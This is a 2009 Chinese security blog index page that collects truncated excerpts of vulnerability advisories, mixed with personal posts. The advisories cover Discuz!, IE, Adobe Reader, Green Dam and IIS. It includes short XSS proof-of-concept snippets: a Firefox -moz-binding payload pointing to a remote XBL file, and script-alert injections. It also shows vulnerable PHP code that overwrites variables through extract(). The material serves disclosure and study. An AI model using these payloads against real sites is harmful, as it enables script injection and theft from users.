rosicky311(小浩)[HACKBASE]
百度空间 | 百度首页 
               
 
文章列表
 
2009-06-26 08:59

作者:褚诚云

《程序员》文章。申明。文章仅代表个人观点,与所在公司无任何联系。

1.概述

跨站脚本Cross-Site Scripting(XSS)是最为流行的Web安全漏洞之一。据统计,2007年,跨站脚本类的安全漏洞的数目已经远远超出传统类型的安全漏洞【1】。那么,什么是跨站脚本?它的危害性是什么?Web开发人员如何在开发过程中避免这类的安全漏洞?就是我们这篇文章要讨论的内容。

 
2009-06-23 08:59
影响版本:
Powered by Discuz!NT 2.6 以下
漏洞描述:
Discuz!NT 版本中的usercpspacemanagealbum.aspx,usercpspacephotoadd.aspx等文件没有正确地过滤用户传递的albumtitle及多个变量(只针对安装相册插件的版本)。个人设置文件,usercpprofile.aspx文件没有正确地过滤用户传递realname,idcard。导致XSS攻击产生,可用于挂马,盗取网站敏感信息等一系列危害用户的危险行
 
2009-06-19 09:34

1. firefox2 css xss vulnerabilities

<style>BODY{-moz-binding:url("http://www.80vul.coom/test.xml#xss")}</style>

test.xml:

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<bindingSpellE">xss">
<implementation>
<constructor><![CDATA[alert('XSS')]]></constructor>
</implementation>
</binding>
 
2009-06-16 09:35

Green Dam remote buffer overflow exploit

"Green Dam" is a software used for monitoring and anti-pornography, popularizing by
Chinese goverment. After July 1st, it will be forced to install on all new Chinese PCs.
Now it already has 50 million copies in China.
In order to monitor the URL that user is exploring, Green Dam injected the browser
process. When Green Dam is trying to handle a long URL, a stack overflow will occur in the
browser process.

 
2009-06-11 21:33

好多天没有更新BLOG了~
毕业了~呵呵~
人在上海 浦东~收拾自己租的房子~准备步入社会 参加工作了~呵呵~满心期待

 
2009-06-11 21:32
影响版本:
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP4
测试方法:
http://www.coresecurity.com/files/attachments/PoC-CORE-2008-0826.zip
临时解
 
2009-05-26 00:10
添加时间:2009-05-25

系统编号:WAVDB-01432

影响版本:DVBBS 8.0.0-8.2.0


程序介绍:
动 网论坛做为动网主要服务产品之一,自2001年投入推广并运营以来,得到了国内外广大互联网用户的广泛好评和支持。做为国内第一的互联网论坛服务品牌,占 据了国内论坛服务市场的70%以上的用户,动网论坛服务在一些如电影、下载、网游等热门网站的占有率甚至高达80%以上,是中国论坛服务领域事实上的标准
 
2009-05-23 13:42

18日开始,著名免费dns服务提供商的6台服务器开始受到攻击.dnspod为诸多网站提供域名解析服务,其中包含暴风影音.

18日晚上20点33分59秒.在史无前例的大流量攻击下dnspod的6台解析服务器开始失效,大量网站开始间歇性无法访问,其中包括国内诸多知名网站,当然,其中也包含我的不知名网站.第一波攻击的流量在21点30分左右达到高峰,流量超过了10Gbps,如下图 ,要知道,一个电信核心机房的带宽也仅仅最多只有几十G

 
2009-05-13 08:40
影响版本:
Discuz! 5.50
在Discuz!论坛的include/common.inc.php文件中:

$magic_quotes_gpc = get_magic_quotes_gpc();

@extract(daddslashes($_COOKIE));
@extract(daddslashes($_POST));
@extract(daddslashes($_GET));
//覆盖变量,这里我们可以覆盖$_SERVER
if(!$magic_quotes_gpc) {
$_FILES = daddslashes($_FILES);
}

.....

if(getenv('HTTP_CLIENT_IP') &
 
2009-05-06 07:41

作者:孤鸿影

作者已通知腾讯。

漏洞一:

QQ校友 班级共享硬盘 上传文件时对文件描述没有做任何过滤,导致XSS。

QQ校友使用了Ajax技术,来显示文件列表。在文件Msharemsg.js中使用innerHTML输出文件列表的HTML代码。由于使用了innerHTML,所以直接插入代码: <script>alert('孤鸿影')</script>不会被执行。使用下面的格式既可:<

 
2009-04-30 16:50
影响版本:
Adobe Acrobat Reader 8.1.4
Adobe Acrobat Reader 9.1
漏洞描述:
BUGTRAQ ID: 34736

Adobe Reader是一款PDF文件解析程序。
Adobe Reader处理Javascript存在问题,远程攻击者可以利用漏洞以运行用户权限执行任意代码。
构建包含超长名的注解,在使用'getAnnots()' Javascript函数解析时可触发缓冲区溢出,导致以运行Adobe Reader应用程序的安全上
 
2009-04-26 02:40

Microsoft Internet Infomation Server 6.0 ISAPI Filename Analytic Vulnerability

function Copyright()
{

var Author=”80sec”;
var Email=”kEvin#80sec.com”.replace(”#”,”@”)
var Site=”http://www.80sec.com”;
var Date=new Date(2009,4,24).toLocaleString();
var Reference=”http://www.80sec.com/Microsoft-Internet-Infomation-Server-6-ISAPI-f

 
2009-04-26 02:39
信息来源:邪恶八进制信息安全团队(www.eviloctal.com
文章作者:风雪残士 http://blog.tkbbs.com
本文首发本人BLOG: http://blog.tkbbs.com
如果转载请注明作者与出处 谢谢
前几天出现访问空间弹出广告 开始没怎么注意 后来经一位朋友说 看我一篇日志经常出现广告。 加上自己的经历。
 
2009-04-24 03:05
转自:http://hi.baidu.com/menzhi007

XSS利用:http://images.g.cn/imgres?imgurl=http://hi.baidu.com/menzhi007&imgrefurl=http://hi.baidu.com/menzhi007

转自:http://hi.baidu.com/menzhi007

严格的说这只是个跳转,因为我们的URL里面并不存在Script脚本。我们可以利用跳转到的页面,编写js脚本。

 
2009-04-21 00:02
对!你没看错!是Oracle!我彻底的震惊了~~看新闻把~~

甲骨文以现金收购Sun微系统公司,交易价格达74亿美元。该协议达成后,IBM公司放弃了收购网络设备制造商。IBM公司此前表示愿意以每股9.40美元购买Sun公司的股票,但收购谈判破裂后,IBM公司于本月初取消独家谈判权,IBM并撤回其报价。

甲骨文Oracle预期购买在交易关闭之后的第一年每股增加至少15 美分的所得。该交易已被Sun公司的董事会通过,甲骨文公司预计将在今年夏天完成此次的交易。

泄露的内部邮件说明了Sun已经被Oracle以每股$9.50收购,并且Sun官
 
     
 
 
个人档案
 
rosicky311
男, 23岁
吉林 长春 
上次登录:
1天前
加为好友
 
   
 
文章分类
 
 
 
 
 
 
 
 
     
 
宠物专区
 
   
 
其它
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     
 
最新评论
 
文章评论|照片评论

 

这是2008年程序员合订本?
 

[表情]
 

加油啊~!
 

94``````
 
不是Ipone or M8
this is shan zhai
 
     
 
背景音乐
 
 
最近访客
 
 

mm_bai

阴俊睾大的面包

rialover

zdf0123456789

qweerwangke

独自メ寂寞

Keys2shell

xu521huan
     
 
好友最新文章
 
     


©2009 Baidu